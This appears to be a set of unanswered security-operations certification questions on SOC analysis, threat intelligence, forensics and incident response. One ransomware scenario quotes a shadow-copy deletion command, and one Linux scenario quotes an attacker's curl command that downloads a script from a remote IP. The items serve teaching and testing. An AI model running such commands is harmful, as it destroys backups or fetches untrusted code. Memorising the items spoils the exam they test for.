A SOC analyst is reviewing NetFlow data from Cisco Secure Network Analytics (formerly Stealthwatch) and observes a sustained, low-volume stream of outbound traffic on TCP port 53 from a database server. This server is not authorized to perform DNS resolution for external domains. The traffic pattern avoids high-volume thresholds that would trigger standard alerts. Which analytic technique is most effective for identifying this potential DNS tunneling activity?
A DevSecOps engineer is building a Python script to automate the enrichment of IP address indicators using the Cisco SecureX API. The script must check if an IP address has a malicious disposition and, if so, create a new sighting associated with a specific incident. Which two API endpoints are essential for this workflow? (Select TWO).
During a malware analysis process in a sandbox environment, a file is observed performing the following sequence of actions: 1. Executes `vssadmin.exe Delete Shadows /All /Quiet`. 2. Makes numerous file modifications with high entropy in user directories. 3. Establishes an outbound connection to a known Tor exit node. 4. Deletes itself from the original execution path. Which type of malware is most likely being analyzed?
A SOC team is implementing a Threat Intelligence Platform (TIP) to automate the consumption of threat feeds. They need to use a standardized data format for representing cyber threat information and a protocol specifically designed for exchanging it. Which combination of standard and protocol should they implement?
An incident responder is performing a forensic investigation on a compromised Windows Server. The initial alert from Cisco Secure Endpoint indicated a fileless malware attack executed via PowerShell. The server has been successfully isolated from the network to prevent lateral movement. To adhere to forensic best practices, the responder must collect evidence based on the order of volatility. Which action must be performed FIRST?
A cybersecurity architect is designing a security posture for a hybrid cloud environment. A key requirement is to prevent endpoints from connecting to known malicious domains, IPs, and URLs, regardless of whether the endpoint is on the corporate network or connected remotely. The solution must provide DNS-layer security and act as a secure web gateway. Which Cisco security product is best suited to meet these requirements?
True or False: In a CI/CD pipeline, static application security testing (SAST) is performed on running code in a production or staging environment to identify vulnerabilities.
A financial services company, FinSecure, is undergoing a security audit. The auditor needs to review the company's incident response procedures. FinSecure's SOC uses a playbook for handling suspected phishing attacks that result in a user credential compromise. The playbook is initiated when a user reports a suspicious email, which is then analyzed by a SOAR platform. The SOAR platform automatically extracts indicators (URLs, attachment hashes) and enriches them using threat intelligence feeds. If an indicator is found to be malicious, an alert is generated. The playbook requires a SOC analyst to then perform several actions: force a password reset for the affected user, search email logs for other recipients of the same phishing email, and block the malicious indicators at the firewall and web proxy. According to the standard NIST incident response lifecycle (SP 800-61), which phase encompasses the analyst's actions of resetting the password and blocking the indicators?
While investigating a compromised Linux host, an analyst discovers that the attacker gained initial access and then downloaded a script from a remote server using the command `curl -o /tmp/p.sh http://198.51.100.10/p.sh`. The analyst needs to understand the script's contents without executing it. Which command should the analyst use to safely view the script?
A security team uses a vulnerability scanner that reports a critical vulnerability (CVSS score 9.8) on an internal web server. However, the team determines that the server is located on a highly segmented network, is not accessible from the internet, and has a compensating control in place that mitigates the specific attack vector. How should this vulnerability be handled in the vulnerability management process?